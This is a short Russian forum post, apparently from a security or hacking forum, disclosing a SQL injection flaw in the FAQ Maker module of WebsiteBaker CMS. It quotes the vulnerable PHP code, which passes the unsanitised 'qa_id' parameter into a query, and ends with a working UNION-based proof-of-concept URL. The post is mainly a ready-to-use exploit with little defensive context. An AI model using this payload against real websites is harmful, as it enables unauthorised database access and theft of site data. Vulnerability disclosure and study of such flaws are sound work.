16.12.2013, 21:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
WebsiteBaker CMS
Уязвимый модуль : FAQ Maker
SQL Injection
требования: mq = Off
/modules/faqmaker/view.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]....
if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'qa_id'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'qa_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$t_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$q_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$qa[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$query_quests[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"mod_faqmaker_questions` WHERE question_id='[/COLOR][COLOR="#0000BB"]$q_id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$query_quests[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchRow[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'answer'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$modified_when[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$quests[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'modified_when'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$wb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]preprocess[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]);
....
[/COLOR][/COLOR]
PoC: /page.php?qa_id=1.2'+and+0+union+select+1,2,3,4,5,6 ,7,8--+
|
|
|